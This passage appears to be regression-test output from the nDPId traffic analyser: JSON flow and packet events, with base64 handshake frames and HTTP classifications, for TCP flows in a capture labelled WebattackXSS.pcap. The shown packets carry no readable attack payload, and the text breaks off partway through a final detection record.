-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":563,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347927657,"flow_last_seen":1499347927657,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347927657,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34158,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":563,"flow_packet_id":1,"flow_last_seen":1499347927657,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347927657,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NcxAAD4GkASsEAABwKgKMoVuAFCXD6SrAAAAAKACchAK5wAAAgQFtAQCCAoBPJFnAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7973,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":563,"flow_packet_id":2,"flow_last_seen":1499347927657,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347927657,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhW4waOSnlw+krKAScSCP9AAAAgQFtAQCCAoD5mLbATyRZwEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7974,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":563,"flow_packet_id":3,"flow_last_seen":1499347927658,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347927658,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Nc1AAD4GkAusEAABwKgKMoVuAFCXD6SsMGjkqIAQAOUu\/AAAAQEICgE8kWcD5mLb"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7993,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":564,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347930265,"flow_last_seen":1499347930265,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347930265,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34184,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7993,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":564,"flow_packet_id":1,"flow_last_seen":1499347930265,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347930265,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8OHxAAD4GjVSsEAABwKgKMoWIAFCpfquPAAAAAKACchDu7QAAAgQFtAQCCAoBPJPzAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7994,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":564,"flow_packet_id":2,"flow_last_seen":1499347930265,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347930265,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhYivvJwGqX6rkKAScSA6vAAAAgQFtAQCCAoD5mVnATyT8wEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7995,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":564,"flow_packet_id":3,"flow_last_seen":1499347930266,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347930266,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0OH1AAD4GjVusEAABwKgKMoWIAFCpfquQr7ycB4AQAOXZwwAAAQEICgE8k\/MD5mVn"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8002,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":565,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347931529,"flow_last_seen":1499347931529,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347931529,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34198,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8002,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":565,"flow_packet_id":1,"flow_last_seen":1499347931529,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347931529,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8j75AAD4GNhKsEAABwKgKMoWWAFDyyRqRAAAAAKACchA1VwAAAgQFtAQCCAoBPJUvAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8003,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":565,"flow_packet_id":2,"flow_last_seen":1499347931530,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347931530,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhZYdLW4k8skakqAScSBAWwAAAgQFtAQCCAoD5majATyVLwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8004,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":565,"flow_packet_id":3,"flow_last_seen":1499347931530,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347931530,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0j79AAD4GNhmsEAABwKgKMoWWAFDyyRqSHS1uJYAQAOXfYgAAAQEICgE8lS8D5maj"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8023,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":566,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347934152,"flow_last_seen":1499347934152,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347934152,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34224,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8023,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":566,"flow_packet_id":1,"flow_last_seen":1499347934152,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347934152,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8DbVAAD4GuBusEAABwKgKMoWwAFC\/7poKAAAAAKACchDmDgAAAgQFtAQCCAoBPJe\/AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8024,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":566,"flow_packet_id":2,"flow_last_seen":1499347934152,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347934152,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhbAhVp9vv+6aC6AScSC5DgAAAgQFtAQCCAoD5mkzATyXvwEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8025,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":566,"flow_packet_id":3,"flow_last_seen":1499347934152,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347934152,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0DbZAAD4GuCKsEAABwKgKMoWwAFC\/7poLIVafcIAQAOVYFgAAAQEICgE8l78D5mkz"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8032,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":567,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347935445,"flow_last_seen":1499347935445,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347935445,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34238,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8032,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":567,"flow_packet_id":1,"flow_last_seen":1499347935445,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347935445,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8lcJAAD4GMA6sEAABwKgKMoW+AFC8fgzAAAAAAKACchB1eAAAAgQFtAQCCAoBPJkCAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8033,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":567,"flow_packet_id":2,"flow_last_seen":1499347935445,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347935445,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhb4dfTaTvH4MwaAScSCz6gAAAgQFtAQCCAoD5mp2ATyZAgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8034,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":567,"flow_packet_id":3,"flow_last_seen":1499347935445,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347935445,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0lcNAAD4GMBWsEAABwKgKMoW+AFC8fgzBHX02lIAQAOVS8gAAAQEICgE8mQID5mp2"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8044,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":568,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347936727,"flow_last_seen":1499347936727,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347936727,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34252,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8044,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":568,"flow_packet_id":1,"flow_last_seen":1499347936727,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347936727,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8IMJAAD4GpQ6sEAABwKgKMoXMAFAQdrqBAAAAAKACchBycAAAAgQFtAQCCAoBPJpDAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":568,"flow_packet_id":2,"flow_last_seen":1499347936727,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347936727,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhcyowg88EHa6gqAScSBLswAAAgQFtAQCCAoD5mu3ATyaQwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8046,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":568,"flow_packet_id":3,"flow_last_seen":1499347936728,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347936728,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0IMNAAD4GpRWsEAABwKgKMoXMAFAQdrqCqMIPPYAQAOXqugAAAQEICgE8mkMD5mu3"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":493,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347805119,"flow_last_seen":1499347810842,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347936881,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32878,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":493,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347805119,"flow_last_seen":1499347810842,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347936881,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32878,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":494,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347806390,"flow_last_seen":1499347811528,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347936881,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32892,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":494,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347806390,"flow_last_seen":1499347811528,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347936881,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32892,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":496,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347810243,"flow_last_seen":1499347815843,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347936881,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32932,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":496,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347810243,"flow_last_seen":1499347815843,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347936881,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32932,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":497,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347811525,"flow_last_seen":1499347816843,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347936881,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32946,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":497,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347811525,"flow_last_seen":1499347816843,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347936881,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32946,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":498,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347812797,"flow_last_seen":1499347817844,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347936881,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32960,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":498,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347812797,"flow_last_seen":1499347817844,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347936881,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32960,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":499,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347814066,"flow_last_seen":1499347819845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347936881,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32974,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":499,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347814066,"flow_last_seen":1499347819845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347936881,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32974,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":458,"flow_state":"finished","flow_packets_processed":311,"flow_first_seen":1499347743331,"flow_last_seen":1499347811268,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1870,"flow_tot_l4_payload_len":232375,"flow_avg_l4_payload_len":747,"midstream":0,"thread_ts_msec":1499347936881,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60464,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8062,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":569,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347939286,"flow_last_seen":1499347939286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347939286,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34278,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8062,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":569,"flow_packet_id":1,"flow_last_seen":1499347939286,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347939286,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86O9AAD4G3OCsEAABwKgKMoXmAFBSpnQtAAAAAKACchBz+wAAAgQFtAQCCAoBPJzCAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8063,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":569,"flow_packet_id":2,"flow_last_seen":1499347939286,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347939286,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQheYnhiyyUqZ0LqAScSCuhQAAAgQFtAQCCAoD5m42ATycwgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8064,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":569,"flow_packet_id":3,"flow_last_seen":1499347939286,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347939286,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06PBAAD4G3OesEAABwKgKMoXmAFBSpnQuJ4Yss4AQAOVNjQAAAQEICgE8nMID5m42"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8074,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":570,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347940593,"flow_last_seen":1499347940593,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347940593,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34292,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8074,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":570,"flow_packet_id":1,"flow_last_seen":1499347940593,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347940593,"pkt":"ABm5CmnxAMGxFOsxCABFAAA87cVAAD4G2AqsEAABwKgKMoX0AFCR9XPMAAAAAKACchAzuAAAAgQFtAQCCAoBPJ4JAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8075,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":570,"flow_packet_id":2,"flow_last_seen":1499347940593,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347940593,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhfTE5Ae8kfVzzaAScSD0kgAAAgQFtAQCCAoD5m99ATyeCQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8076,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":570,"flow_packet_id":3,"flow_last_seen":1499347940594,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347940594,"pkt":"ABm5CmnxAMGxFOsxCABFAAA07cZAAD4G2BGsEAABwKgKMoX0AFCR9XPNxOQHvYAQAOWTmgAAAQEICgE8ngkD5m99"} -01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":569,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347939286,"flow_last_seen":1499347941874,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499347941874,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34278,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 